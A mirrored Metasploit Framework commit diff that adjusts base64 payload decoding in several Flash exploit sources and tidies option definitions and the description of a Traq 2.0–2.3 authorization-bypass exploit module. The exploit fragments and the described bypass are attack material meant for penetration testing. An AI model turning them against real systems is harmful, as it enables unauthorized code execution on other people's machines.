mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-02 07:40:19 +02:00
Solve conflics
This commit is contained in:
commit
e9714bfc82
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@ -27,7 +27,10 @@ package
|
||||
public function Main()
|
||||
{
|
||||
var b64:Base64Decoder = new Base64Decoder()
|
||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
b64_payload = b64_payload.replace(pattern, "+")
|
||||
b64.decode(b64_payload)
|
||||
var payload:String = b64.toByteArray().toString()
|
||||
|
||||
for (i = 0; i < bv.length; i++) {
|
||||
|
@ -32,9 +32,11 @@ package
|
||||
var i:uint = 0
|
||||
var j:uint = 0
|
||||
|
||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
||||
payload = b64.toByteArray().toString();
|
||||
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
b64_payload = b64_payload.replace(pattern, "+")
|
||||
b64.decode(b64_payload)
|
||||
payload = b64.toByteArray().toString()
|
||||
for (i = 0; i < defrag.length; i++) {
|
||||
defrag[i] = new ByteArray()
|
||||
defrag[i].length = BYTE_ARRAY_SIZE
|
||||
|
@ -42,8 +42,11 @@ package
|
||||
this.object_vector_length = 5770 * 2
|
||||
this.byte_array_vector_length = 510 * 2
|
||||
|
||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
||||
payload = b64.toByteArray().toString();
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
b64_payload = b64_payload.replace(pattern, "+")
|
||||
b64.decode(b64_payload)
|
||||
payload = b64.toByteArray().toString()
|
||||
|
||||
this.initialize_worker_and_ba()
|
||||
if (!this.trigger())
|
||||
|
@ -39,7 +39,10 @@ public class Main extends Sprite
|
||||
|
||||
private function mainThread():void
|
||||
{
|
||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
b64_payload = b64_payload.replace(pattern, "+")
|
||||
b64.decode(b64_payload)
|
||||
payload = b64.toByteArray().toString()
|
||||
|
||||
ba.length = 0x1000
|
||||
|
@ -43,7 +43,10 @@ package
|
||||
|
||||
private function mainThread():void
|
||||
{
|
||||
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
|
||||
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
|
||||
var pattern:RegExp = / /g;
|
||||
b64_payload = b64_payload.replace(pattern, "+")
|
||||
b64.decode(b64_payload)
|
||||
payload = b64.toByteArray().toString()
|
||||
ba.length = 0x1000
|
||||
ba.shareable = true
|
||||
|
@ -47,7 +47,7 @@ module Exploit::Remote::HttpClient
|
||||
Rex::Proto::Http::Client::DefaultUserAgent
|
||||
]),
|
||||
OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
|
||||
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
|
||||
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
|
||||
OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]),
|
||||
OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', false]),
|
||||
OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]),
|
||||
|
@ -17,12 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
This module exploits an arbitrary command execution vulnerability in
|
||||
Traq 2.0 to 2.3. It's in the admincp/common.php script.
|
||||
|
||||
This function is called in each script located into /admicp/ directory to
|
||||
make sure the user has admin rights, but this is a broken authorization
|
||||
schema due to the header() function doesn't stop the execution flow. This
|
||||
can be exploited by malicious users to execute admin functionality resulting
|
||||
for e.g. in execution of arbitrary PHP code leveraging of plugins.php
|
||||
functionality.
|
||||
This function is called in each script located in the /admicp/ directory to
|
||||
make sure the user has admin rights. This is a broken authorization schema
|
||||
because the header() function doesn't stop the execution flow.
|
||||
This can be exploited by malicious users to execute admin functionality,
|
||||
e.g. execution of arbitrary PHP code leveraging of plugins.php functionality.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']),
|
||||
OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]),
|
||||
OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']),
|
||||
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp'])
|
||||
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# The USERNAME and PASSWORD are registered again to make them more obvious they're
|
||||
# configurable.
|
||||
OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']),
|
||||
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
|
||||
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']),
|
||||
OptString.new('PATH', [ true, "The path to attempt to upload", '/metasploit%RAND%.asp'])
|
||||
], self.class)
|
||||
end
|
||||
|
Loading…
Reference in New Issue
Block a user